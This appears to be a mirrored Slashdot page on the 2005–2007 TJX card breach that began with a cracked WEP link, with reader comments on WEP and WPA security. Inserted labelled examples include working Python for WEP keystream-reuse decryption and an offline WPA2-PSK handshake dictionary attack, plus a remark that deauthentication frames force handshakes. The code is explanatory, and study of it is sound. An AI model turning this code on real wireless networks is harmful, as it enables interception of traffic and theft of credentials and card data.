Slashdot Mirror


TJX Breach Began With WEP Crack

An anonymous reader sends us to the Wall Street Journal for a detailed report on what is known to date about the TJX data breach. It seems that the loss of over 45 million credit card numbers and more than 450,000 SSNs, driver's license numbers, and military identifications began with someone using a "telescope-shaped" antenna aimed at the wireless link of a Marshalls store near St. Paul, Minnesota in July 2005. The link was encrypted using WEP, which had been known to be broken since 2001. The crackers who got into the TJX central databases are believed to be Romanians or Russians with ties to the Russian mobs. The eventual cost of the TJX fiasco could exceed $1 billion, not including the numerous lawsuits filed against the retailer.
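The WEP weakness the report turns on, as an added example that is not part of the story or of the WSJ report: WEP builds each packet's RC4 key from a 3-byte IV sent in the clear plus the shared key, so two frames under the same IV share a keystream. Ciphertext XOR known plaintext (the LLC/SNAP header at the start of almost every data frame, or a packet the attacker provoked) yields that keystream, and every other frame with the same IV then decrypts without the key. The key, IV, frame contents and card number below are constructed for the demo; 802.11 headers are omitted, the CRC-32 ICV is modelled.

```python
"""WEP keystream reuse: constructed demo, not code from the page or the report."""
import struct
import zlib
from typing import Tuple

# First 8 bytes of nearly every WEP-protected data frame (LLC/SNAP header, IPv4).
# This is free known plaintext for the attacker.
SNAP_IPV4 = bytes.fromhex("aaaa030000000800")


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Per-packet RC4 key is IV || shared key; the IV travels in the clear."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: decrypt and verify the ICV."""
    iv, body = frame[:3], frame[3:]
    clear = xor(body, rc4(iv + key, len(body)))
    plaintext, tag = clear[:-4], clear[-4:]
    if icv(plaintext) != tag:
        raise ValueError("bad ICV")
    return plaintext


def keystream_from_known_frame(frame: bytes, known_prefix: bytes) -> Tuple[bytes, bytes]:
    """Attacker: ciphertext XOR a known prefix of (plaintext || ICV) gives that many
    keystream bytes for this IV. Pass SNAP_IPV4 for 8 bytes, or plaintext + icv(plaintext)
    for a frame whose contents the attacker provoked and therefore knows in full."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body[: len(known_prefix)], known_prefix)


def decrypt_reused_iv(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Attacker: a later frame under the same IV reuses the keystream, so it decrypts
    without the key. WEP has only 2^24 IVs and many cards restart at 0 on power-up,
    so on a busy network reuse is a matter of hours."""
    if frame[:3] != iv:
        raise ValueError("different IV; this keystream does not apply")
    return xor(frame[3 : 3 + len(keystream)], keystream)


# Constructed demo data: not a real key, not real traffic, a well-known test PAN.
KEY = bytes.fromhex("0123456789abcdef0123456789")  # 104-bit WEP key
IV = b"\x00\x00\x2a"
KNOWN = SNAP_IPV4 + b"attacker-provoked ping payload, contents fully known."
SECRET = SNAP_IPV4 + b"PAN=4111111111111111 exp=0912"


def demo() -> bytes:
    """Recover SECRET (plus its ICV) from frame_b using only frame_a's known plaintext."""
    frame_a = wep_encrypt(KEY, IV, KNOWN)
    frame_b = wep_encrypt(KEY, IV, SECRET)  # same IV: the flaw
    iv, keystream = keystream_from_known_frame(frame_a, KNOWN + icv(KNOWN))
    return decrypt_reused_iv(frame_b, iv, keystream)


if __name__ == "__main__":
    print(demo())
```

The shared key is never recovered here; it does not need to be. The FMS/KoreK-style attacks that retrieve the key itself from weak IVs are what turned "hours of sniffing" into "minutes", but keystream reuse alone already reads card data off the air, and it is the part of the WEP design that no firmware update could fix.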

7 of 164 comments

  1. Re:Ok? by pchan- · · Score: 4, Informative

    TJX - commonly known to American consumers as TJ Maxx and Marshalls retail stores. If you made purchases at these stores, you could be affected.

  2. Re:Why isn't WEP recalled? by arth1 · · Score: 4, Informative

    There's plenty of older hardware that doesn't have the processing power to do WPA, and has to rely on WEP. This is especially true for embedded devices (like print servers and bar code scanners) and PDAs. And for larger companies, replacing every single access point AND WiFi-device isn't a small thing.
    Could you imagine being the IT manager who has to tell upper management that the big expense you added to the budget two years ago, which was supposed to last five years before being incrementally replaced, now has to be completely trashed and replaced in one go because the encryption turned out to not be safe?

    The best thing many companies can do short term is to limit the damage, by restricting the use of WEP to data that they can afford losing. But even that requires admitting flaws, and is likely to get your head chopped off for bringing the bad news.

  3. Re:Ironic by Anonymous Coward · · Score: 1, Informative

    It wasn't that sensitive info was going over WEP, it's that getting in through WEP allowed them to install a sniffer on a wired router. The weakness of WEP is only the first link in an insecure chain. No servers were compromised because none needed to be.

  4. Re:Can someone explain to me by C_L_Lk · · Score: 2, Informative

    I run a small business and this is exactly how the credit card transactions take place. A customer comes in to the store and purchases something and wishes to use their credit card - the card is swiped through a terminal that uses a dial-up modem connection back to the bank's clearing house - a conversation takes place between the terminal and the remote server (at a mighty 9600bps) - and either an "approved" or "declined" is returned and a *PAPER* receipt (2 part) is thermally printed. The customer gets one copy of that and one copy of the register receipt. I keep one copy of the register receipt for proof of what they purchased, along with the signed copy of their purchase. The credit card companies (Visa/MC/Am Ex) all require I keep those paper records for 1 year in case of charge backs, etc. Each evening when the business closes the paper receipts are collected and put in a manila envelope marked with the day's date and the envelope is placed in a locked filing cabinet in the back office. At the beginning of each month, credit card purchase receipts more than 1 year past are burned in the incinerator - the filing cabinet never has more than 12 past months' data, and none of it is stored in electronic format anywhere on premise. The point of sale software's database has a record of all transactions ever taken place as far as inventory, amount paid, taxes collected - but it has nothing that can tie the purchase to a customer or that customer's financial information. I don't see why any size business of any type couldn't follow that method of doing business.

  5. Re:Why isn't WEP recalled? by chihowa · · Score: 2, Informative

    So you're either referring to this dictionary attack or you're just making stuff up. All of the reported WPA cracks are for WPA-PSK and are brute force cracks. I don't see why you'd need modified firmware to do a brute force attack (although I guess you could make it faster that way, but ideally you'd do the attack on captured traffic, so it wouldn't make a difference). If you're instead referring to some super secret uberleet method to take advantage of a flaw in the crypto of WPA (like the weak IVs or small keyspace of WEP) then out with it! Pretending like you've solved a very difficult problem but refusing to tell people how you did it screams of you making it all up.

    And a brute force attack isn't a real crack, either. Quoting MechaBlue on this site:

    WPA-PSK may be vulnerable to a brute force attack but, with the choice of the right password, it becomes unfeasible. Assuming a decent utility is used, a 31 character long password of random upper- and lowercase letters and numbers results in 62^31, or 3.7x10^55 possible combinations. If we assume 60 attempts per second, it will take more than 1.3x10^36 times the age of the universe (15 billion years) to attempt every possible combination. The average time would be half that, or 6.5x10^35 times the age of the universe. Even if someone were to come up with a scheme that reduced the bruteforce time to 1 trillionth of what would be required otherwise, it would still take 6.5x10^23 times the age of the universe. And so on... Unless someone finds another way to get the password (e.g., can determine it from traffic (like with WEP), beats it out of me, hacks my laptop, etc.), my WAP will remain secure until long after I'm dead. And that's good enough for me.

    Thinking about it, though, I'd bet you could pick up traces of the unencrypted datastream in poorly designed cards. That's hardly a crack for the crypto, though.

    --
    If you want a vision of the future, imagine a youtube comments section scrolling - forever.

  6. Re:Ironic by Klinky · · Score: 2, Informative

    You may be surprised at how many customers whine at any inconvenience, even for their own good. Start questioning Bob Smith about his card and he's going to get huffy at the inconvenience of having to pull out some photo ID or answer some security questions or get upset over the "accusation" of being a thief. "Well, I am Bob Smith, I know who I am.". Yeah, OK. I do customer service over the phone. We require the last 4 of the CC# we have on file to verify people calling in are who they are. We let people know that we'll need the last 4 numbers while they're listening to the hold music. But I still get numerous customers who don't have it ready & then get upset that they really are going to have to get their wallet out & read those last 4 digits off as hard as that is to do. Also it's not only a consumer issue. While there is a data mine to be had with insecure commercial operations, there's quite a bit that can be had at insecure or stupid personal locations. A person can have their ID stolen from their own insecure network connection, or from not logging out of their MySpace account on a public computer. Also plain old non technological ways as well, such as throwing bank statements or sensitive info into a garbage bin w/o shredding it. So no, it's not just about "lazy corporate fuckwits".

  7. Re:Why isn't WEP recalled? by bentcd · · Score: 2, Informative

    cracking WPA requires only the 4 way handshake and the use of a decent dictionary or brute force attack
    You seem to have left something out: Cracking WPA also requires that the administrator decided to use a weak key, i.e. one that is susceptible to brute force or dictionary attacks. But if you are allowed to assume this, then any encryption is "easily" cracked. Even OTP is trivially cracked if the key sequence is easy to guess.

    --
    sigs are hazardous to your health
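The attack chihowa (comment 5) and bentcd (comment 7) are arguing about, as an added example that belongs to neither commenter and is not code from the page: with WPA/WPA2-PSK the only thing an attacker needs off the air is one four-way handshake, because the message-2 MIC is a function of the passphrase, the SSID, both MAC addresses and both nonces, all of which are visible. Each guess then costs one PBKDF2 run of 4096 HMAC-SHA1 iterations (which is why rates like "60 attempts per second" were typical on 2007 hardware), and a passphrase that is not in the dictionary simply never matches. The SSID, MACs, nonces, EAPOL frame and word list below are constructed; the key derivation follows IEEE 802.11i for key descriptor version 2 (WPA2/CCMP, HMAC-SHA1-128 MIC).

```python
"""Offline dictionary attack on a captured WPA2-PSK four-way handshake.
Constructed demo: the 'capture' is generated locally from a known passphrase."""
import hashlib
import hmac
import secrets
import string
from typing import Dict, Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    This is the per-guess cost that makes brute force slow but not impossible."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || counter) concatenated."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for counter in range(4):
        out += hmac.new(pmk, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:64]  # first 16 bytes are the KCK, which keys the EAPOL MIC


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2: MIC = HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[:16].
    (Version 1, WPA/TKIP, uses HMAC-MD5 instead.)"""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str, ssid: str) -> Dict[str, bytes]:
    """Stand-in for a pcap of the handshake. Everything here is constructed; a real
    attacker reads these fields out of the sniffed EAPOL frames."""
    ap = bytes.fromhex("001122334455")   # constructed BSSID
    sta = bytes.fromhex("66778899aabb")  # constructed client MAC
    anonce = secrets.token_bytes(32)
    snonce = secrets.token_bytes(32)
    # Minimal EAPOL-Key message 2, MIC field zeroed: version, type, length, descriptor,
    # key info 0x010a (version 2, pairwise, MIC set), key length, replay counter,
    # SNonce, key IV, RSC, key ID, MIC, key data length. Real frames also carry an RSN IE.
    eapol = (b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x10" + b"\x00" * 8 + snonce
             + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    return {"ssid": ssid.encode(), "ap": ap, "sta": sta, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def dictionary_attack(hs: Dict[str, bytes], wordlist: Iterable[str]) -> Optional[str]:
    """Recompute the MIC for each candidate; a match means the candidate is the PSK."""
    ssid = hs["ssid"].decode()
    for word in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), hs["ap"], hs["sta"],
                           hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return word
    return None


def random_passphrase(length: int = 31) -> str:
    """The 62^31 keyspace from MechaBlue's arithmetic: letters and digits, CSPRNG-chosen."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


# Constructed word list; real ones run to hundreds of millions of entries.
WORDLIST = ["password", "letmein", "qwerty123", "password123", "changeme"]

if __name__ == "__main__":
    print(dictionary_attack(capture_handshake("password123", "example-net"), WORDLIST))
    print(dictionary_attack(capture_handshake(random_passphrase(), "example-net"), WORDLIST))
```

Note what the attacker does not need: no modified firmware and no further traffic, only the handshake, which a deauthentication frame will make any client repeat on demand. That is bentcd's point made concrete: the crypto is not what gives way, the passphrase is, and a random 31-character one is outside any word list.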